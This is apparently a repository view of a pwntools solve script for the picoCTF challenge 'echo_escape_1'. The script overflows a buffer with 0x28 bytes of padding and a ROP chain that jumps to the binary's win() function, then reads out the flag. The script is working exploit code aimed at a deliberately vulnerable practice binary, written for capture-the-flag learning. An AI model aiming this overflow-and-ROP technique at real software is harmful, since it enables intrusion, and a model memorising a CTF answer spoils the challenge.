Files
picoctf/pwn/echo_escape_1/solve.py
T
2026-07-02 08:24:29 +09:00

34 lines
662 B
Python
Executable File

#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "mysterious-sea.picoctf.net 50726".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
r.recvuntil(b'Please enter your name: ').decode()
offset = 0x28
rop = ROP(exe)
rop.raw(rop.generatePadding(0, offset))
rop.win()
r.sendline(rop.chain())
print(r.recvline_contains(b'picoCTF').decode())
r.close()
if __name__ == "__main__":
main()